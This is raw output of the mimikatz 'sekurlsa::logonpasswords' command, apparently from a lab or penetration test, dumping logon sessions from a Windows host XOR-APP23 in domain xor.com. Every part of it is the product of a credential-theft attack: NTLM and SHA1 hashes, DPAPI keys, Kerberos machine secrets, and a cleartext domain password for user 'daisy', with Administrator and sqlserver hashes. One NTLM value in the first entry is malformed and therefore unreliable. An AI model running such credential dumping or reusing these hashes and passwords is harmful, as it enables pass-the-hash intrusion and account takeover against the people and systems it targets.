mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 8715819 (00000000:0084fe2b)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/23/2021 4:50:06 AM
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XOR-APP23$
         * Domain   : xor
         * NTLM     : b568e43dfsa323e1205bae5cc894b46ea9
         * SHA1     : 13e3c4b124f3b8694e4efd32a17f8ffcbe724365
        tspkg :
        wdigest :
         * Username : XOR-APP23$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP23$
         * Domain   : xor.com
         * Password : f0 7f 0c d7 5b ce 79 22 34 ec 76 8e bd 5f 74 33 36 de be 08 0e 6f 03 9c 21 78 f6 2b 5b 9f 75 2f 31 ac 7a 91 45 8f d2 de 0e 47 40 c6 26 a0 d8 ef c7 db d8 1e 24 fe b0 df 71 5a 4b 9f e0 94 57 cd 66 43 59 32 1f 45 64 65 6d 52 47 9b 2c 50 db d9 ec 85 e6 ea 88 5d 3a 4d 8e 10 2e cd 00 bc e9 56 0a fe 7d 35 5b 47 4a 25 33 2c 15 12 6b fc 24 19 9c 4b ae 5d d6 a7 1c b0 8c 21 35 ee 34 0b 51 ff 22 78 d4 5c 48 3d ba 34 f2 83 e6 d4 f7 6b c1 d3 27 74 cd 4d af cf 00 a7 cd ae 88 0b 4c 48 7d 99 72 08 e3 d8 fb 8f b4 06 67 48 ff 2b 3f 53 82 9e f3 0a a1 50 08 20 5b 38 3a 5d c7 27 a7 85 92 e6 49 42 1c 60 41 07 0a 9a 13 e4 34 1c 57 a7 c7 0f 4b 4e 29 9e df 65 88 ef fe bf 6c 5b ce ec bc b1 db 7a f6 a6 8d 7e a9 01 24 ff 5d 6c d9 b3 6f 93
        ssp :
        credman :

Authentication Id : 0 ; 8715656 (00000000:0084fd88)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/23/2021 4:50:06 AM
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XOR-APP23$
         * Domain   : xor
         * NTLM     : b568e43da323e1205bae5cc894b46ea9
         * SHA1     : 13e3c4b124f3b8694e4efd32a17f8ffcbe724365
        tspkg :
        wdigest :
         * Username : XOR-APP23$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP23$
         * Domain   : xor.com
         * Password : f0 7f 0c d7 5b ce 79 22 34 ec 76 8e bd 5f 74 33 36 de be 08 0e 6f 03 9c 21 78 f6 2b 5b 9f 75 2f 31 ac 7a 91 45 8f d2 de 0e 47 40 c6 26 a0 d8 ef c7 db d8 1e 24 fe b0 df 71 5a 4b 9f e0 94 57 cd 66 43 59 32 1f 45 64 65 6d 52 47 9b 2c 50 db d9 ec 85 e6 ea 88 5d 3a 4d 8e 10 2e cd 00 bc e9 56 0a fe 7d 35 5b 47 4a 25 33 2c 15 12 6b fc 24 19 9c 4b ae 5d d6 a7 1c b0 8c 21 35 ee 34 0b 51 ff 22 78 d4 5c 48 3d ba 34 f2 83 e6 d4 f7 6b c1 d3 27 74 cd 4d af cf 00 a7 cd ae 88 0b 4c 48 7d 99 72 08 e3 d8 fb 8f b4 06 67 48 ff 2b 3f 53 82 9e f3 0a a1 50 08 20 5b 38 3a 5d c7 27 a7 85 92 e6 49 42 1c 60 41 07 0a 9a 13 e4 34 1c 57 a7 c7 0f 4b 4e 29 9e df 65 88 ef fe bf 6c 5b ce ec bc b1 db 7a f6 a6 8d 7e a9 01 24 ff 5d 6c d9 b3 6f 93
        ssp :
        credman :

Authentication Id : 0 ; 8715180 (00000000:0084fbac)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 3/23/2021 4:50:06 AM
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : XOR-APP23$
         * Domain   : xor
         * NTLM     : b568e43da323e1205bae5cc894b46ea9
         * SHA1     : 13e3c4b124f3b8694e4efd32a17f8ffcbe724365
        tspkg :
        wdigest :
         * Username : XOR-APP23$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP23$
         * Domain   : xor.com
         * Password : f0 7f 0c d7 5b ce 79 22 34 ec 76 8e bd 5f 74 33 36 de be 08 0e 6f 03 9c 21 78 f6 2b 5b 9f 75 2f 31 ac 7a 91 45 8f d2 de 0e 47 40 c6 26 a0 d8 ef c7 db d8 1e 24 fe b0 df 71 5a 4b 9f e0 94 57 cd 66 43 59 32 1f 45 64 65 6d 52 47 9b 2c 50 db d9 ec 85 e6 ea 88 5d 3a 4d 8e 10 2e cd 00 bc e9 56 0a fe 7d 35 5b 47 4a 25 33 2c 15 12 6b fc 24 19 9c 4b ae 5d d6 a7 1c b0 8c 21 35 ee 34 0b 51 ff 22 78 d4 5c 48 3d ba 34 f2 83 e6 d4 f7 6b c1 d3 27 74 cd 4d af cf 00 a7 cd ae 88 0b 4c 48 7d 99 72 08 e3 d8 fb 8f b4 06 67 48 ff 2b 3f 53 82 9e f3 0a a1 50 08 20 5b 38 3a 5d c7 27 a7 85 92 e6 49 42 1c 60 41 07 0a 9a 13 e4 34 1c 57 a7 c7 0f 4b 4e 29 9e df 65 88 ef fe bf 6c 5b ce ec bc b1 db 7a f6 a6 8d 7e a9 01 24 ff 5d 6c d9 b3 6f 93
        ssp :
        credman :

Authentication Id : 0 ; 428522 (00000000:000689ea)
Session           : Interactive from 0
User Name         : Administrator
Domain            : XOR-APP23
Logon Server      : XOR-APP23
Logon Time        : 3/22/2021 12:14:21 PM
SID               : S-1-5-21-4269079787-19373159-2510549293-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : XOR-APP23
         * NTLM     : 57321e6a0eef2c45985c9fa49c5cd24f
         * SHA1     : 6b5d3f465b87d759e448697e3b2a71f07cbeae5a
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : XOR-APP23
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : XOR-APP23
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 331147 (00000000:00050d8b)
Session           : Batch from 0
User Name         : daisy
Domain            : xor
Logon Server      : XOR-DC01
Logon Time        : 3/22/2021 12:13:32 PM
SID               : S-1-5-21-2293535422-227910474-3663383505-1119
        msv :
         [00000003] Primary
         * Username : daisy
         * Domain   : xor
         * NTLM     : f6084ca1a4905c45747d4bdcc1fcab84
         * SHA1     : f5988d2f98cefd7287db5db5e7368c5e5d66eb02
         * DPAPI    : fb1d27d76302f96f6a2faee0d62bd221
        tspkg :
        wdigest :
         * Username : daisy
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : daisy
         * Domain   : XOR.COM
         * Password : XorPasswordIsDead17
        ssp :
        credman :

Authentication Id : 0 ; 98936 (00000000:00018278)
Session           : Service from 0
User Name         : SQLTELEMETRY$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 3/10/2021 7:08:24 PM
SID               : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
        msv :
         [00000003] Primary
         * Username : XOR-APP23$
         * Domain   : xor
         * NTLM     : b568e43da323e1205bae5cc894b46ea9
         * SHA1     : 13e3c4b124f3b8694e4efd32a17f8ffcbe724365
        tspkg :
        wdigest :
         * Username : XOR-APP23$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP23$
         * Domain   : xor.com
         * Password : f0 7f 0c d7 5b ce 79 22 34 ec 76 8e bd 5f 74 33 36 de be 08 0e 6f 03 9c 21 78 f6 2b 5b 9f 75 2f 31 ac 7a 91 45 8f d2 de 0e 47 40 c6 26 a0 d8 ef c7 db d8 1e 24 fe b0 df 71 5a 4b 9f e0 94 57 cd 66 43 59 32 1f 45 64 65 6d 52 47 9b 2c 50 db d9 ec 85 e6 ea 88 5d 3a 4d 8e 10 2e cd 00 bc e9 56 0a fe 7d 35 5b 47 4a 25 33 2c 15 12 6b fc 24 19 9c 4b ae 5d d6 a7 1c b0 8c 21 35 ee 34 0b 51 ff 22 78 d4 5c 48 3d ba 34 f2 83 e6 d4 f7 6b c1 d3 27 74 cd 4d af cf 00 a7 cd ae 88 0b 4c 48 7d 99 72 08 e3 d8 fb 8f b4 06 67 48 ff 2b 3f 53 82 9e f3 0a a1 50 08 20 5b 38 3a 5d c7 27 a7 85 92 e6 49 42 1c 60 41 07 0a 9a 13 e4 34 1c 57 a7 c7 0f 4b 4e 29 9e df 65 88 ef fe bf 6c 5b ce ec bc b1 db 7a f6 a6 8d 7e a9 01 24 ff 5d 6c d9 b3 6f 93
        ssp :
        credman :

Authentication Id : 0 ; 50446 (00000000:0000c50e)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/10/2021 7:08:22 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XOR-APP23$
         * Domain   : xor
         * NTLM     : b568e43da323e1205bae5cc894b46ea9
         * SHA1     : 13e3c4b124f3b8694e4efd32a17f8ffcbe724365
        tspkg :
        wdigest :
         * Username : XOR-APP23$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP23$
         * Domain   : xor.com
         * Password : f0 7f 0c d7 5b ce 79 22 34 ec 76 8e bd 5f 74 33 36 de be 08 0e 6f 03 9c 21 78 f6 2b 5b 9f 75 2f 31 ac 7a 91 45 8f d2 de 0e 47 40 c6 26 a0 d8 ef c7 db d8 1e 24 fe b0 df 71 5a 4b 9f e0 94 57 cd 66 43 59 32 1f 45 64 65 6d 52 47 9b 2c 50 db d9 ec 85 e6 ea 88 5d 3a 4d 8e 10 2e cd 00 bc e9 56 0a fe 7d 35 5b 47 4a 25 33 2c 15 12 6b fc 24 19 9c 4b ae 5d d6 a7 1c b0 8c 21 35 ee 34 0b 51 ff 22 78 d4 5c 48 3d ba 34 f2 83 e6 d4 f7 6b c1 d3 27 74 cd 4d af cf 00 a7 cd ae 88 0b 4c 48 7d 99 72 08 e3 d8 fb 8f b4 06 67 48 ff 2b 3f 53 82 9e f3 0a a1 50 08 20 5b 38 3a 5d c7 27 a7 85 92 e6 49 42 1c 60 41 07 0a 9a 13 e4 34 1c 57 a7 c7 0f 4b 4e 29 9e df 65 88 ef fe bf 6c 5b ce ec bc b1 db 7a f6 a6 8d 7e a9 01 24 ff 5d 6c d9 b3 6f 93
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XOR-APP23$
Domain            : xor
Logon Server      : (null)
Logon Time        : 3/10/2021 7:08:21 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XOR-APP23$
         * Domain   : xor
         * NTLM     : b568e43da323e1205bae5cc894b46ea9
         * SHA1     : 13e3c4b124f3b8694e4efd32a17f8ffcbe724365
        tspkg :
        wdigest :
         * Username : XOR-APP23$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : xor-app23$
         * Domain   : XOR.COM
         * Password : f0 7f 0c d7 5b ce 79 22 34 ec 76 8e bd 5f 74 33 36 de be 08 0e 6f 03 9c 21 78 f6 2b 5b 9f 75 2f 31 ac 7a 91 45 8f d2 de 0e 47 40 c6 26 a0 d8 ef c7 db d8 1e 24 fe b0 df 71 5a 4b 9f e0 94 57 cd 66 43 59 32 1f 45 64 65 6d 52 47 9b 2c 50 db d9 ec 85 e6 ea 88 5d 3a 4d 8e 10 2e cd 00 bc e9 56 0a fe 7d 35 5b 47 4a 25 33 2c 15 12 6b fc 24 19 9c 4b ae 5d d6 a7 1c b0 8c 21 35 ee 34 0b 51 ff 22 78 d4 5c 48 3d ba 34 f2 83 e6 d4 f7 6b c1 d3 27 74 cd 4d af cf 00 a7 cd ae 88 0b 4c 48 7d 99 72 08 e3 d8 fb 8f b4 06 67 48 ff 2b 3f 53 82 9e f3 0a a1 50 08 20 5b 38 3a 5d c7 27 a7 85 92 e6 49 42 1c 60 41 07 0a 9a 13 e4 34 1c 57 a7 c7 0f 4b 4e 29 9e df 65 88 ef fe bf 6c 5b ce ec bc b1 db 7a f6 a6 8d 7e a9 01 24 ff 5d 6c d9 b3 6f 93
        ssp :
        credman :

Authentication Id : 0 ; 32447 (00000000:00007ebf)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 3/10/2021 7:08:21 PM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : XOR-APP23$
         * Domain   : xor
         * NTLM     : b568e43da323e1205bae5cc894b46ea9
         * SHA1     : 13e3c4b124f3b8694e4efd32a17f8ffcbe724365
        tspkg :
        wdigest :
         * Username : XOR-APP23$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP23$
         * Domain   : xor.com
         * Password : f0 7f 0c d7 5b ce 79 22 34 ec 76 8e bd 5f 74 33 36 de be 08 0e 6f 03 9c 21 78 f6 2b 5b 9f 75 2f 31 ac 7a 91 45 8f d2 de 0e 47 40 c6 26 a0 d8 ef c7 db d8 1e 24 fe b0 df 71 5a 4b 9f e0 94 57 cd 66 43 59 32 1f 45 64 65 6d 52 47 9b 2c 50 db d9 ec 85 e6 ea 88 5d 3a 4d 8e 10 2e cd 00 bc e9 56 0a fe 7d 35 5b 47 4a 25 33 2c 15 12 6b fc 24 19 9c 4b ae 5d d6 a7 1c b0 8c 21 35 ee 34 0b 51 ff 22 78 d4 5c 48 3d ba 34 f2 83 e6 d4 f7 6b c1 d3 27 74 cd 4d af cf 00 a7 cd ae 88 0b 4c 48 7d 99 72 08 e3 d8 fb 8f b4 06 67 48 ff 2b 3f 53 82 9e f3 0a a1 50 08 20 5b 38 3a 5d c7 27 a7 85 92 e6 49 42 1c 60 41 07 0a 9a 13 e4 34 1c 57 a7 c7 0f 4b 4e 29 9e df 65 88 ef fe bf 6c 5b ce ec bc b1 db 7a f6 a6 8d 7e a9 01 24 ff 5d 6c d9 b3 6f 93
        ssp :
        credman :

Authentication Id : 0 ; 8748532 (00000000:00857df4)
Session           : RemoteInteractive from 2
User Name         : sqlserver
Domain            : xor
Logon Server      : XOR-DC01
Logon Time        : 3/23/2021 4:50:36 AM
SID               : S-1-5-21-2293535422-227910474-3663383505-1170
        msv :
         [00000003] Primary
         * Username : sqlServer
         * Domain   : xor
         * NTLM     : 643f5625a4e347d9208dba1c3f299af4
         * SHA1     : 7fd3e2ca57a4b13171b7ad99b2d21fa612c3206b
         * DPAPI    : 2965fc85666d374dc1260b47976be1e6
        tspkg :
        wdigest :
         * Username : sqlServer
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : sqlServer
         * Domain   : XOR.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 8748470 (00000000:00857db6)
Session           : RemoteInteractive from 2
User Name         : sqlserver
Domain            : xor
Logon Server      : XOR-DC01
Logon Time        : 3/23/2021 4:50:36 AM
SID               : S-1-5-21-2293535422-227910474-3663383505-1170
        msv :
         [00000003] Primary
         * Username : sqlServer
         * Domain   : xor
         * NTLM     : 643f5625a4e347d9208dba1c3f299af4
         * SHA1     : 7fd3e2ca57a4b13171b7ad99b2d21fa612c3206b
         * DPAPI    : 2965fc85666d374dc1260b47976be1e6
        tspkg :
        wdigest :
         * Username : sqlServer
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : sqlserver
         * Domain   : XOR.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 297757 (00000000:00048b1d)
Session           : Interactive from 0
User Name         : Administrator
Domain            : XOR-APP23
Logon Server      : XOR-APP23
Logon Time        : 3/10/2021 7:10:42 PM
SID               : S-1-5-21-4269079787-19373159-2510549293-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : XOR-APP23
         * NTLM     : 57321e6a0eef2c45985c9fa49c5cd24f
         * SHA1     : 6b5d3f465b87d759e448697e3b2a71f07cbeae5a
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : XOR-APP23
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : XOR-APP23
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 3/10/2021 7:08:22 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 50497 (00000000:0000c541)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/10/2021 7:08:22 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XOR-APP23$
         * Domain   : xor
         * NTLM     : 48cb949bacfd9d60ecf1df4413b6c75b
         * SHA1     : 27cb422f37d122f537c8bfcdc18590c09e87d34d
        tspkg :
        wdigest :
         * Username : XOR-APP23$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP23$
         * Domain   : xor.com
         * Password : 77 03 5e 8b 5d 42 a4 ce f2 b0 0f 9f 1f c1 1b 17 49 54 20 f1 fe 11 d5 87 06 28 b8 1e 57 0f 38 b1 45 5f d9 f9 69 94 64 91 f1 fb c4 4f 80 46 f5 13 d7 93 f2 c7 96 9a f2 aa f0 c4 9e 2b c3 86 95 24 a9 c1 3f d6 2d 95 39 3d d3 11 17 36 df 62 86 18 bb c6 a3 7e 0d e0 8f a1 6d df a1 4e 0e 6b 40 cf 3d fd 4d 21 61 04 b5 69 30 50 06 95 7a 65 35 ea a0 df 16 b9 1f b4 2e ba de 6f 81 d8 cd c6 6f 91 16 8b c8 89 6f 72 de 92 cd 33 d5 ee 30 4f 73 db 88 1e b6 0a ce fe 25 b7 f0 85 2d 7e 45 b8 2f 1d 86 1e 64 4d 6a 89 8d 03 73 53 36 a9 10 8d 2d 67 91 c6 2e 9c 59 61 e5 1c cb d5 ef 4d 3c 9c e4 80 c3 7d aa 7c 21 32 fc 78 11 5b 4c 92 96 c1 4b 0c ac 18 60 62 71 d4 36 1c 3a 62 c6 6e 72 bf 4c e3 3b b3 32 f9 d7 5c e2 82 cb a0 28 18 4b 32 e0 33
        ssp :
        credman :

Authentication Id : 0 ; 32346 (00000000:00007e5a)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 3/10/2021 7:08:21 PM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : XOR-APP23$
         * Domain   : xor
         * NTLM     : b568e43da323e1205bae5cc894b46ea9
         * SHA1     : 13e3c4b124f3b8694e4efd32a17f8ffcbe724365
        tspkg :
        wdigest :
         * Username : XOR-APP23$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP23$
         * Domain   : xor.com
         * Password : f0 7f 0c d7 5b ce 79 22 34 ec 76 8e bd 5f 74 33 36 de be 08 0e 6f 03 9c 21 78 f6 2b 5b 9f 75 2f 31 ac 7a 91 45 8f d2 de 0e 47 40 c6 26 a0 d8 ef c7 db d8 1e 24 fe b0 df 71 5a 4b 9f e0 94 57 cd 66 43 59 32 1f 45 64 65 6d 52 47 9b 2c 50 db d9 ec 85 e6 ea 88 5d 3a 4d 8e 10 2e cd 00 bc e9 56 0a fe 7d 35 5b 47 4a 25 33 2c 15 12 6b fc 24 19 9c 4b ae 5d d6 a7 1c b0 8c 21 35 ee 34 0b 51 ff 22 78 d4 5c 48 3d ba 34 f2 83 e6 d4 f7 6b c1 d3 27 74 cd 4d af cf 00 a7 cd ae 88 0b 4c 48 7d 99 72 08 e3 d8 fb 8f b4 06 67 48 ff 2b 3f 53 82 9e f3 0a a1 50 08 20 5b 38 3a 5d c7 27 a7 85 92 e6 49 42 1c 60 41 07 0a 9a 13 e4 34 1c 57 a7 c7 0f 4b 4e 29 9e df 65 88 ef fe bf 6c 5b ce ec bc b1 db 7a f6 a6 8d 7e a9 01 24 ff 5d 6c d9 b3 6f 93
        ssp :
        credman :

Authentication Id : 0 ; 31231 (00000000:000079ff)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 3/10/2021 7:08:21 PM
SID               :
        msv :
         [00000003] Primary
         * Username : XOR-APP23$
         * Domain   : xor
         * NTLM     : b568e43da323e1205bae5cc894b46ea9
         * SHA1     : 13e3c4b124f3b8694e4efd32a17f8ffcbe724365
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XOR-APP23$
Domain            : xor
Logon Server      : (null)
Logon Time        : 3/10/2021 7:08:21 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XOR-APP23$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : xor-app23$
         * Domain   : XOR.COM
         * Password : f0 7f 0c d7 5b ce 79 22 34 ec 76 8e bd 5f 74 33 36 de be 08 0e 6f 03 9c 21 78 f6 2b 5b 9f 75 2f 31 ac 7a 91 45 8f d2 de 0e 47 40 c6 26 a0 d8 ef c7 db d8 1e 24 fe b0 df 71 5a 4b 9f e0 94 57 cd 66 43 59 32 1f 45 64 65 6d 52 47 9b 2c 50 db d9 ec 85 e6 ea 88 5d 3a 4d 8e 10 2e cd 00 bc e9 56 0a fe 7d 35 5b 47 4a 25 33 2c 15 12 6b fc 24 19 9c 4b ae 5d d6 a7 1c b0 8c 21 35 ee 34 0b 51 ff 22 78 d4 5c 48 3d ba 34 f2 83 e6 d4 f7 6b c1 d3 27 74 cd 4d af cf 00 a7 cd ae 88 0b 4c 48 7d 99 72 08 e3 d8 fb 8f b4 06 67 48 ff 2b 3f 53 82 9e f3 0a a1 50 08 20 5b 38 3a 5d c7 27 a7 85 92 e6 49 42 1c 60 41 07 0a 9a 13 e4 34 1c 57 a7 c7 0f 4b 4e 29 9e df 65 88 ef fe bf 6c 5b ce ec bc b1 db 7a f6 a6 8d 7e a9 01 24 ff 5d 6c d9 b3 6f 93
        ssp :
        credman :